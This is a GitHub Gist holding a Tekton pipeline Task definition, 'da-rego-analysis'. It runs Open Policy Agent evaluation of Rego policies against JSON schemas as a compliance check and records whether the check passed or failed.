Last active
October 26, 2021 16:17
-
-
Save aavarghese/be5f365b68a33bab6455d0e57b8d51af to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
apiVersion: tekton.dev/v1beta1 | |
kind: Task | |
metadata: | |
name: da-rego-analysis | |
spec: | |
params: | |
- name: repository | |
description: the git repo | |
- name: policy-dir | |
description: the directory where the rego policy files are located | |
default: policydir | |
- name: schema-dir | |
description: the directory where the json schema files are located | |
default: schemadir | |
- name: directory-name | |
description: directory name where the repository is cloned | |
- name: pipeline-debug | |
description: toggles debug mode for the pipeline | |
default: "0" | |
results: | |
- name: status | |
description: status of deployment analyzer task, possible value are- success|failure | |
- name: evidence-store | |
description: filepath to store deployment analyzer task evidence | |
- name: rego-check-comment | |
description: md file with detailed results of compliance check | |
stepTemplate: | |
env: | |
- name: PIPELINE_RUN_ID | |
valueFrom: | |
fieldRef: | |
fieldPath: metadata.annotations['devops.cloud.ibm.com/tekton-pipeline'] | |
- name: PIPELINE_DEBUG | |
value: $(params.pipeline-debug) | |
steps: | |
- name: rego-analysis | |
image: icr.io/gitsecure/gitsecure-rego:1.1.0 | |
env: | |
- name: REPOSITORY | |
value: $(params.repository) | |
imagePullPolicy: Always | |
workingDir: "/artifacts" | |
command: ["/bin/sh", "-c"] | |
args: | |
- | | |
#!/bin/sh | |
if [ "$PIPELINE_DEBUG" = "1" ]; then | |
pwd | |
ls /artifacts/ | |
env | |
trap env EXIT | |
set -x +e | |
fi | |
POLICY_DIR_PATH="/artifacts/$(params.directory-name)/$(params.policy-dir)" | |
SCHEMA_DIR_PATH="/artifacts/$(params.directory-name)/$(params.schema-dir)" | |
result="failure" | |
echo "Running OPA eval with schema" | |
opa eval data -d $POLICY_DIR_PATH -s $SCHEMA_DIR_PATH --format pretty > da-rego-check-comment.md | |
if [ $? -eq 0 ]; then export result="success"; fi | |
if [[ $PIPELINE_DEBUG == 1 ]]; | |
then | |
echo $result | |
whoami | |
ls -l /artifacts/ | |
fi | |
echo "COMMENT_FP=./da-rego-check-comment.md" >> /steps/next-step-env.properties | |
echo -n $result > "$(results.status.path)" | |
volumeMounts: | |
- mountPath: /steps | |
name: steps-volume | |
workspaces: | |
- name: artifacts | |
mountPath: /artifacts | |
volumes: | |
- name: steps-volume | |
emptyDir: {} | |
- name: docker-socket | |
emptyDir: {} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment